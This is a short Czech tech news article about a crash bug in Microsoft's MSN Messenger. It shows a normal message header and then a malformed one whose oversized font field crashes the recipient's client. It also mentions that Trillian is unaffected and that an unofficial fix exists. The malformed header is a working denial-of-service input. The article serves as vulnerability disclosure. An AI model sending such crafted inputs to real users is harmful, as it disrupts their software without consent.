Bezpečnostní chyba v MSN Messengeru

Podle všeho tento komunikační klient od Microsoftu obsahuje bezpečnostní chybu, která zapříčiní jeho pád. MSN Messenger odesílá s každou zprávou i průvodní hlavičku, která obsahuje informace o použitém fontu, jeho velikosti, barvě a další informace.

Normální hlavička vypadá asi takto:

MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
X-MMS-IM-Format: FN=MS%20Sans%20Serif; EF=B; CO=ff; CS=0; PF=22

hey friend, how are you?

Pokud zaměníme pole font u hlavičky zprávy za dlouhý řetězec, například:

MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
X-MMS-IM-Format: FN=Times%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20
%20New%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20
Roman%20%20%20%20%20%20%20%20%20%20%20; EF=B; CO=ff; CS=0; PF=22

hey friend, how are you?

U příjemce dojde k pádu MSN Messengera. Pro zajímavost, postižen je pouze MSN Messenger, Trillian touto chybou netrpí.

Neoficiální opravu na tuto chybu můžete najít na Heavy K`s Hideout.

Diskuze (3) Další článek: ProjectX cracknul Xbox

Témata článku: , , , , , , , , , , ,